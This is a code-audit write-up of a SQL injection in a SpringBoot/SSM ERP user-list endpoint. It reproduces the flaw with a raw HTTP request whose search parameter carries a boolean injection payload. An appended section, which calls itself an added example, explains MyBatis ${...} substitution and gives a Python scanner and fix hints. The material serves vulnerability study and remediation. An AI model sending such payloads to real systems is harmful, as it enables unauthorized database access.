Code audit: SpringBoot + SSM (ERP) SQL injection

1. Identify the persistence-layer framework and search for its key signatures

 

2. Locate the entry parameters

 

 

3. Reproduction

 

GET /user/list?search=%7B%22userName%22%3A%22%22%2C%22loginName%22%3A%22'%20and%201=2%20and%20'1%25'='1%22%7D&currentPage=1&pageSize=15 HTTP/1.1
Host: 10.0.112.77:8087
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://10.0.112.77:8087/pages/manage/user.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: rememberMe=[value removed]; JSESSIONID=1DCFF4552E623B19B03EF71E2D63DF7A; Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1677654788; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1677659123
Connection: close
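Step 1 (searching the persistence layer for its key signature) together with the reproduction request above, as an added example that is not part of the original post: in an SSM stack the persistence layer is MyBatis, and the signature to search for in mapper XML is `${...}`, which splices the value into the SQL text instead of binding it, which is why a loginName of `' and 1=2 and '1%'='1` can rewrite the LIKE condition behind /user/list. The audit helper below scans a constructed mapper (the namespace com.example.erp.dao.UserMapper and its statements are assumptions, not the audited project's real file) and reports each `${...}` with a rewrite hint.

```python
import re
from dataclasses import dataclass

# Constructed MyBatis mapper (assumption, not the audited project's file): the
# search statement concatenates loginName into LIKE via ${...}; one statement
# binds with the safe #{...}; one uses ${...} for ORDER BY.
SAMPLE_MAPPER = """\
<mapper namespace="com.example.erp.dao.UserMapper">
  <select id="findByCondition" resultType="User">
    select * from user where 1=1
    <if test="loginName != null and loginName != ''">
      and login_name like '%${loginName}%'
    </if>
  </select>
  <select id="findByLoginName" resultType="User">
    select * from user where login_name = #{loginName}
  </select>
  <select id="listOrdered" resultType="User">
    select * from user order by ${orderBy}
  </select>
</mapper>
"""

@dataclass
class Finding:
    statement_id: str   # id= of the enclosing <select>/<insert>/... element
    line: int           # 1-based line in the mapper file
    param: str          # name inside ${...}
    context: str        # 'like', 'order by' or 'other'

STATEMENT_RE = re.compile(r'<(?:select|insert|update|delete)\b[^>]*\bid="([^"]+)"')
SUBST_RE = re.compile(r'\$\{\s*([^}]+?)\s*\}')   # ${...} = raw string substitution

def audit_mapper(xml_text: str) -> list[Finding]:
    """Flag every ${...} in a mapper: unlike #{...} it is spliced into the SQL text."""
    findings, current_id = [], "?"
    for lineno, line in enumerate(xml_text.splitlines(), 1):
        m = STATEMENT_RE.search(line)
        current_id = m.group(1) if m else current_id
        for hit in SUBST_RE.finditer(line):
            before = line[: hit.start()].lower()
            ctx = "like" if " like " in before else "order by" if "order by" in before else "other"
            findings.append(Finding(current_id, lineno, hit.group(1), ctx))
    return findings

def suggested_fix(f: Finding) -> str:
    """Rewrite hint: bind with #{...}; ORDER BY needs a whitelist, not a bound parameter."""
    if f.context == "like":
        return f"like concat('%', #{{{f.param}}}, '%')"
    if f.context == "order by":
        return f"map {f.param} to a fixed column list in Java, then use the chosen literal"
    return f"#{{{f.param}}}"
```

Run audit_mapper over every mapper XML under src/main/resources to get the list of statements to trace back to controller parameters in step 2.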
